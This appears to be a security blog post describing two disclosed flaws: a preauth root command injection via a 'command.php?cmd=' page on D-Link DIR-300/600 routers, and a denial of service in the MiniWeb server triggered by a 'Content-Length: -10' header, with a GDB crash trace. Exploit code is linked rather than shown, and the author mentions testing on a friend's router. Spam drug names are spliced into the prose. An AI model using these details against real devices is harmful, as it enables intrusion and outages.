Back… With exploits!

So, sovaldi finally my DNS issues and suchlike got sorted out, and the server has been migrated to a new host. Email is back as of a few hours ago (few issues with MX records and mailboxes or something and emails being delivered 10 times to me, but I think that will fix itself after a few days. I hope so anyway, because being bombed with 100 messages 10 times each is getting plenty bloody annoying).

Everything is upgraded to the new wordpress, no more nasty hacking the config files to get WP to work on a server not designed to run it.

So, while the site was “inactive”, I was working on a whole bunch of new content (and finishing old articles) to publish. Seeing as I have exams, I shall just leave a few gifts here for you to look at until they are over. dietrich may have something for you also :)

So, in order to keep everyone entertained for the next few days, check out the following piece of exploit engineering.

D-LINK DIR-300 and DIR-600 routers have a hilarious preauth remote root flaw in their web interface. A webpage called “command.php” that accepts a “cmd=$cmd” and executes it as root. EPIC FAIL. Why was that there? Ask D-LINK.

It was discovered by a German researcher, @s3cur1ty_de and you can read his original advisory here: http://www.s3cur1ty.de/m1adv2013-003

I had some free time in college, so I knocked up a quick PoC tool to exploit the flaw, and even managed to test the exploit on a friends router after class.

PoC Code: http://pastebin.com/raw.php?i=yPDKP86n

Remote Root

Remote Root

It delivers my customary user friendly shell interface, exploiting command injection. It can also autoenable TELNET and grant Telnet access, though this is seemingly less reliable, it hung when I tried it after rebooting the router.

Will be writing some more exploits, and maybe publishing them soon, so stay tuned ;)

MiniWeb DoS PoC Exploit

So, cialis quite a while ago, I was fuzzing the MiniWeb Server available from Google Code – Miniweb after I realized that WinCC/SCADA systems also seem to use this web server. (Does this make Siemens in violation of the GPL?).

I had been using one of Metasploits fuzzers, check and noticed an instant crash it was causing, so I started trying to replicate it.

After enlisting the help of ohdae from BindShell Labs, we were able to figure out the crash was caused by the “Content-Length: -10″ part of the malicious HTTP Header, sovaldi basically, it chokes on that and dies. I had been convinced it was something to do with malicious POST data, but thanks to ohdae, that was quickly changed.

After a lot more debugging and playing about, I learned that someone else had gotten to this bug first, and it was not a 0day after all. I also had just about given up on getting remote code execution from this vulnerability.

The original advisory can be found here: http://aluigi.altervista.org/adv/winccflex_1-adv.txt

Anyways, on to the fun stuff. So, here is what GDB looks like when the exploit is ran…

root@bt:~/fuzzme/SCADA# gdb
GNU gdb (GDB) 7.1-ubuntu
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type “show copying”
and “show warranty” for details.
This GDB was configured as “i486-linux-gnu”.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
(gdb) exec-file SCADA
(gdb) run
Starting program: /root/fuzzme/SCADA/SCADA
MiniWeb 0.8.180 (C)2005-09 Stanley Huang (C)2010 Stanley Huang / Felix Wang

Listening port: 80
Web root: webroot
Max clients: 32
URL handlers: 1
Dir listing: on
[6] connection accepted @ May 31 16:15:34
[6] IP: 127.0.0.1
Connected clients: 1

Program received signal SIGSEGV, Segmentation fault.
0x0804c76b in ?? ()
(gdb) info registers
eax            0x0    0
ecx            0x1    1
edx            0xfffffff6    -10
ebx            0x8052718    134555416
esp            0xbffff2c0    0xbffff2c0
ebp            0xbffff318    0xbffff318
esi            0x0    0
edi            0x804f3fa    134542330
eip            0x804c76b    0x804c76b
eflags         0x10246    [ PF ZF IF RF ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51
(gdb)

And here is a screenshot of my exploit killing the server…
MiniWeb WinCC Denial of Service

Finally, to wrap things up, the PoC Exploit: http://pastebin.com/9EW96xGY

~Infodox